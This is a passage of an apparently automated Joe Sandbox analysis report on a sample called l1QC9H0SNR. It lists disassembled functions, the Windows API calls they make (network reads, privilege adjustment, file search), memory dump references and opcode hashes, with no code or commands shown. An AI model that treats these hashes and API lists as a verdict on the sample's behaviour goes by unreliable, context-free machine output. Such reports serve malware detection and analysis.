                                              • GetCursorPos.USER32(?), ref: 00B8B605
                                              • ScreenToClient.USER32(?,?), ref: 00B8B610
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                              • String ID:
                                              • API String ID: 1010295502-0
                                              • Opcode ID: 6059faa924765350d4718e580211d4eb16eaa756625bd44549b69c6a4499d863
                                              • Instruction ID: 31b9e1e43056c6b4cd683374c1fcc8cb351ce029f41caa58a9645e9f6d289da3
                                              • Opcode Fuzzy Hash: 6059faa924765350d4718e580211d4eb16eaa756625bd44549b69c6a4499d863
                                              • Instruction Fuzzy Hash: 97111935501019FBCB00DF98D885AFEB7F8EB05305F404896E901E7250D731AA55CBA5
                                              Function 00B5FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID:
                                              • API String ID: 3964851224-0
                                              • Opcode ID: 42d7b7d5bf3f8c9f47c12882ba2a38d260db85f65c83bf3f4ae906c25e01fd42
                                              • Instruction ID: 133d1a8b40bba1d40241dbc6521b2dd5999847779754aa9a6dec850a18d46ff2
                                              • Opcode Fuzzy Hash: 42d7b7d5bf3f8c9f47c12882ba2a38d260db85f65c83bf3f4ae906c25e01fd42
                                              • Instruction Fuzzy Hash: 769236706183419FDB24EF15C480B2BB7E1FB89304F1489ADE89A9B362D775EC45CB92
                                              Function 00BAE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00BAE628
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: ($|
                                              • API String ID: 1659193697-1631851259
                                              • Opcode ID: 1d7faa32564c724d331ac05738d62806c0d1340193a3a06efcbd03a931916785
                                              • Instruction ID: f3a986dac47a90d9476cbb93ac6e405ee8c54c8299c3357fa155c59bb5743baa
                                              • Opcode Fuzzy Hash: 1d7faa32564c724d331ac05738d62806c0d1340193a3a06efcbd03a931916785
                                              • Instruction Fuzzy Hash: 26322475A047059FDB28CF59C48196AB7F1FF48320B15C4AEE8AADB3A1E770E941CB40
                                              Function 00BC22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00BC180A,00000000), ref: 00BC23E1
                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00BC2418
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Internet$AvailableDataFileQueryRead
                                              • String ID:
                                              • API String ID: 599397726-0
                                              • Opcode ID: 036c7eb5e98e211a494fc7f2f9296353b8eb51f837e10a0d42bfb09ab3292d22
                                              • Instruction ID: 031299da017675b9bc7607d995de80fccc4303d4bbea2a535dce817f2d3cf9ca
                                              • Opcode Fuzzy Hash: 036c7eb5e98e211a494fc7f2f9296353b8eb51f837e10a0d42bfb09ab3292d22
                                              • Instruction Fuzzy Hash: 4741E271A04209BFEB209F95DC81FBBB7FCEB80714F1040AEF615A7240EA749E419664
                                              Function 00BBB3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00BBB40B
                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00BBB465
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00BBB4B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DiskFreeSpace
                                              • String ID:
                                              • API String ID: 1682464887-0
                                              • Opcode ID: ddb221b76f5dbf3c028240f3085b5eebe0e10c3a8b72ebbd78ac0b2c9b658e27
                                              • Instruction ID: 5f56843f3f2d45db027d8df14923181b0ca9586a466ba5b8fcbd272a43d0d4f9
                                              • Opcode Fuzzy Hash: ddb221b76f5dbf3c028240f3085b5eebe0e10c3a8b72ebbd78ac0b2c9b658e27
                                              • Instruction Fuzzy Hash: 6D214A75A00518EFCB00EFA5D890AFDBBF8FF49311F1480AAE905AB361DB319919CB51
                                              Function 00BA87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA882B
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA8858
                                              • GetLastError.KERNEL32 ref: 00BA8865
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                              • String ID:
                                              • API String ID: 1922334811-0
                                              • Opcode ID: 6dab45450c638d4efdcae50f5228ca30f3ac4ceff36cd7f6c0bcd3e650e53762
                                              • Instruction ID: 2e161c6c4d6b07ba67ee330a809a927d5372e2fb7ca59bea94c2b34ba94f69c1
                                              • Opcode Fuzzy Hash: 6dab45450c638d4efdcae50f5228ca30f3ac4ceff36cd7f6c0bcd3e650e53762
                                              • Instruction Fuzzy Hash: 2B1160B1818305AFD718EF94DC85D6BB7F8EB45710B10856EE45A97641EE34AC408B60
                                              Function 00BA874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00BA8774
                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00BA878B
                                              • FreeSid.ADVAPI32(?), ref: 00BA879B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: c3199297661d0ba3b05b91fc02c48cdc14f8a476ab8d46f282da88681596a0ed
                                              • Instruction ID: d8ca4e9ae32616991e549c8adb50b1ef13be0524479796e2536d6d164a00e8a9
                                              • Opcode Fuzzy Hash: c3199297661d0ba3b05b91fc02c48cdc14f8a476ab8d46f282da88681596a0ed
                                              • Instruction Fuzzy Hash: 7AF04F7591530DBFDF00DFF4DC99ABDBBBCEF08201F5044A9A502E3281E6715A048B50
                                              Function 00B516DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                              • GetParent.USER32(?), ref: 00B8B7BA
                                              • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00B519B3,?,?,?,00000006,?), ref: 00B8B834
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: LongWindow$DialogNtdllParentProc_
                                              • String ID:
                                              • API String ID: 314495775-0
                                              • Opcode ID: 1fd35ef2f26a2460d788d697f3bbabb5f821aa97d3639bd1ac8d9a35adc0342a
                                              • Instruction ID: fa86b94eb9f8b89c006c658f7d7b77031c8d76b1512f58c2747ff332f009baa8
                                              • Opcode Fuzzy Hash: 1fd35ef2f26a2460d788d697f3bbabb5f821aa97d3639bd1ac8d9a35adc0342a
                                              • Instruction Fuzzy Hash: 4721CE78201504AFDB209B2CC884FA93BE6EF4A321F5842D0F9255B2F2C7309E55DB50
                                              Function 00BBC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00BBC6FB
                                              • FindClose.KERNEL32(00000000), ref: 00BBC72B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: 3b6aa9e81d66fb32ea4991fa4b28d88972052944be04de8938a10cde16b4cb42
                                              • Instruction ID: 571586f073e2a353af14dff12f3723585fdcec254356e8f3b2677b62bce6e980
                                              • Opcode Fuzzy Hash: 3b6aa9e81d66fb32ea4991fa4b28d88972052944be04de8938a10cde16b4cb42
                                              • Instruction Fuzzy Hash: E21182716046049FDB10DF29C855A6AF7E5EF45361F04855EF8A58B290DB70AC05CF81
                                              Function 00BDC57D Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00B8B93A,?,?,?), ref: 00BDC5F1
                                                • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                              • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00BDC5D7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: LongWindow$DialogMessageNtdllProc_Send
                                              • String ID:
                                              • API String ID: 1273190321-0
                                              • Opcode ID: c5770ac0f15d1d0b702f60a3e75e3750d2d93eb1f70dc3258738cfc498362e17
                                              • Instruction ID: 32a7a22fc7091f3013df0673fb9e6d65f62873b29b12321d061a18bbb55aadeb
                                              • Opcode Fuzzy Hash: c5770ac0f15d1d0b702f60a3e75e3750d2d93eb1f70dc3258738cfc498362e17
                                              • Instruction Fuzzy Hash: BA01F530201205EBDB255F14EC95F6ABFE6FB96328F0441A6FD051B3E0DB31A801DB90
                                              Function 00BDC93E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 00BDC961
                                              • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00B8BA16,?,?,?,?,?), ref: 00BDC98A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClientDialogNtdllProc_Screen
                                              • String ID:
                                              • API String ID: 3420055661-0
                                              • Opcode ID: d9111f54b954b032bedf375cbd584f366b0634c3b5a083e1d0bf90fa333b7f63
                                              • Instruction ID: a313dc204252dd78a4876192e73f22025a450e30b9cb7fc13537b7939edef1f0
                                              • Opcode Fuzzy Hash: d9111f54b954b032bedf375cbd584f366b0634c3b5a083e1d0bf90fa333b7f63
                                              • Instruction Fuzzy Hash: EFF01D72401118FFEB058F45DC19ABEBBB9FB48311F14415AF90152161D7716A51DBA4
                                              Function 00BBA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00BC9468,?,00BDFB84,?), ref: 00BBA097
                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00BC9468,?,00BDFB84,?), ref: 00BBA0A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorFormatLastMessage
                                              • String ID:
                                              • API String ID: 3479602957-0
                                              • Opcode ID: ed04976ea06df65f9682e70db53b8cfac670b8530563a5b6152ce333a6966981
                                              • Instruction ID: 27391c8ca56d3dcfeb052199035b5e3fe7eb0446323b8ca16cf3642d68163259
                                              • Opcode Fuzzy Hash: ed04976ea06df65f9682e70db53b8cfac670b8530563a5b6152ce333a6966981
                                              • Instruction Fuzzy Hash: 3EF0823554522EBBDB21AFA4DC48FFA77ACFF08361F0041A6F909D7191DA709944CBA1
                                              Function 00BDCA7C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BDCA84
                                              • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00B8B995,?,?,?,?), ref: 00BDCAB2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              • Opcode ID: 778f72c1bdc08fd30a972768267d7069ca537684c8fcc3e66bad6457b94c3c6f
                                              • Instruction ID: a5634aead97ee2ef954cc44169316523324d44b96cc156f3abafe3029c068fbc
                                              • Opcode Fuzzy Hash: 778f72c1bdc08fd30a972768267d7069ca537684c8fcc3e66bad6457b94c3c6f
                                              • Instruction Fuzzy Hash: 64E04F7010421ABBEB149F19DC1AFBA7B94EB04751F408216F956DA2E1DA709850D760
                                              Function 00BA81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BA8309), ref: 00BA81E0
                                              • CloseHandle.KERNEL32(?,?,00BA8309), ref: 00BA81F2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AdjustCloseHandlePrivilegesToken
                                              • String ID:
                                              • API String ID: 81990902-0
                                              • Opcode ID: fd4a486cf92163d7fd0558925026936721683aca615791f54eae5ed89d899881
                                              • Instruction ID: 1b2a568df5a99674a2f5f99b3a4cf81dc90baa34e49930d4ffa182a4e62b1d93
                                              • Opcode Fuzzy Hash: fd4a486cf92163d7fd0558925026936721683aca615791f54eae5ed89d899881
                                              • Instruction Fuzzy Hash: 01E08631015911EFE7212B20EC04D73BBE9EF04310714C86EF46681430DB215C90DB10
                                              Function 00B7A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,00BE4178,00B78D57,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00B7A15A
